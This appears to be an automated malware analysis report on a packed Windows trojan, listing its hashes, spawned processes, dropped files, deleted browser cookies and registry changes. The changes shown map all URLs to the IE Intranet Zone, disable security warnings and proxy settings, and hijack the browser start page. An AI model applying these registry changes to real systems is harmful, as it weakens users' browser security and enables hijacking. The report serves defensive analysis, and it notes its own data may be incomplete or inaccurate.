HEUR:Trojan.Win32.Invader (Kaspersky), Gen:Variant.Graftor.94620 (AdAware), WormAutoItGen.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 30ebd5248bf939f8574924d0cd76a554
SHA1: 2a3cadbb1580d6e49fbc1486af7f7575ee902152
SHA256: 801921336350618643de072464dd29f0f46bf2ba49535cd2d7a806dda9070af2
SSDeep: 24576:/NBI/KyLqpALIYXjEAI8LDrrAJEWXR17lP3Dk:o9qpwIYTEs EUvlvg
Size: 1049992 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-12-01 10:08:23
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nvsvc32.exe:2604
MainPro.exe:604
desk.exe:3840
ndis500.exe:2464
ping.exe:496
ping.exe:1388
YP.exe:1236
ndsqp.exe:2428
%original file name%.exe:1532
lgsoyx.exe:3824
shock.exe:3848
The Trojan injects its code into the following process(es):
MainProX.exe:600
Explorer.EXE:880
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process nvsvc32.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\clk.ini (82 bytes)
%WinDir%\run.bat (196 bytes)
%WinDir%\c4ud.dll (1753 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@ssl.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@money.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msnportal.112.2o7[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@auto.search.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hit.gemius[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@pass.yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky.122.2o7[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
The process MainPro.exe:604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\desktop.ini (67 bytes)
The process desk.exe:3840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\190[1].ico (5930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\178[1].ico (3595 bytes)
%WinDir%\Ymb\deskico\cfg.ini (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\184[1].ico (6341 bytes)
%Documents and Settings%\%current user%\Desktop\火爆游戏.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\棋牌大厅.lnk (1 bytes)
%WinDir%\Ymb\deskico\184.ico (5882 bytes)
%WinDir%\Ymb\deskico\178.ico (2390 bytes)
%Documents and Settings%\%current user%\Desktop\´«Ææ°Ãâ€ÂÒµ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\cfg[1].ini (275 bytes)
%WinDir%\Ymb\deskico\190.ico (5882 bytes)
The process ndis500.exe:2464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\drivers\uniconfi.dat (4447 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (491 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (180 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)
The Trojan deletes the following file(s):
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (0 bytes)
%System%\drivers\uniconfi.dat (0 bytes)
The process YP.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Ymb\sys32\shock.exe (1493 bytes)
%System%\tl.dat (8 bytes)
%System%\bc.dat (1784 bytes)
%System%\tl.txt (388 bytes)
%System%\safe.dat (3780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hfftcbc.txt (601 bytes)
%WinDir%\Ymb\sys32\shock.txt (36452 bytes)
%WinDir%\Ymb\sys32\ndis500.txt (43108 bytes)
%WinDir%\Ymb\sys32\tray.txt (144098 bytes)
%WinDir%\Ymb\wow64\nvsvc32.txt (132327 bytes)
%WinDir%\Ymb\wow64\nvsvc32.exe (7715 bytes)
%WinDir%\Ymb\sys32\ndis500.exe (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcnpoku.txt (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\suqpotb.txt (2321 bytes)
%System%\bc.txt (85868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qxoxvnm.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ognbetd.txt (7345 bytes)
%WinDir%\Ymb\sys32\ndsqp.exe (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sgotxct.txt (7547 bytes)
%WinDir%\Ymb\sys32\urlnav.txt (14076 bytes)
%WinDir%\Ymb\First.txt (18796 bytes)
%WinDir%\Ymb\sys32\ndsqp.txt (12588 bytes)
%WinDir%\Ymb\sys32\urlnav.dll (83 bytes)
%WinDir%\Ymb\lgsoyx.exe (110 bytes)
%WinDir%\Ymb\deskico\desk.exe (299 bytes)
%WinDir%\Ymb\deskico\desk.txt (50796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mopdaqf.txt (4545 bytes)
%System%\safe.txt (122772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmifumt.txt (2105 bytes)
%WinDir%\Ymb\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gktmoij.txt (11 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (63836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wohbhrb.txt (673 bytes)
The process ndsqp.exe:2428 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\drivers\uniconfi.dat (8 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (142 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (5 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)
The Trojan deletes the following file(s):
%WinDir%\ax01.da0 (0 bytes)
%System%\drivers\ZWebNds.sys (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (0 bytes)
The process %original file name%.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\jwxf\start.bat (99 bytes)
%WinDir%\jwxf\yp.exe (5033 bytes)
%WinDir%\jwxf\MainProX.exe (1660 bytes)
%WinDir%\jwxf\userip.ipb (936 bytes)
%WinDir%\jwxf\MainPro.exe (18513 bytes)
The Trojan deletes the following file(s):
%WinDir%\jwxf\__tmp_rar_sfx_access_check_1215828 (0 bytes)
The process shock.exe:3848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Ymb\sys32\shock.dll (931 bytes)
Registry activity
The process nvsvc32.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 88 7E 8E 2A B1 89 90 B7 C0 10 E6 23 84 4F E4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"TabProcGrowth" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"DisableDeleteBrowsingHistory" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
The process MainPro.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 24 91 72 F9 3D AC 19 17 17 80 C6 18 67 0D C1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroAvd"
The process desk.exe:3840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnHTTPSToHTTPRedirect" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 01 C7 41 95 5F 3E 03 36 3C 0D 64 27 3F F0 C6"
[HKCR\DeskIcon]
"(Default)" = "1000_7959"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security-zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ndis500.exe:2464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 A6 E3 93 65 77 35 D2 A6 8E A8 2A E5 06 0A C2"
The process ping.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 82 14 14 8F 43 3B 31 DE 58 30 AF E3 CC B3 C0"
The process ping.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 9C 96 6D E4 F8 59 78 F8 EB 6F 6C E8 DE 81 11"
The process MainProX.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 42 B8 19 EF A9 FA C9 A6 20 CC 25 93 DB D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://123.sogou.com/?71084-9278"
"Search Page" = "http://123.sogou.com/?71084-9278"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://123.sogou.com/?71084-9278"
"Search Page" = "http://123.sogou.com/?71084-9278"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://123.sogou.com/?71084-9278"
The process YP.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC E8 51 1F 1F 3F 45 A4 EF C9 06 73 8A B3 2A 77"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process ndsqp.exe:2428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 54 F1 DA CF 13 32 D6 ED 49 8C E8 4F 5A 90 B6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security-zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\ZWebNds\Enum]
[HKLM\System\CurrentControlSet\Services\ZWebNds\Security]
[HKLM\System\CurrentControlSet\Services\ZWebNds]
The process %original file name%.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 6A 4E 88 BE 58 91 12 29 00 09 17 5E BD C9 B7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\WinRAR SFX]
"c%%windows%jwxf" = "c:\windows\jwxf"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\jwxf]
"start.bat" = "start"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security-zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
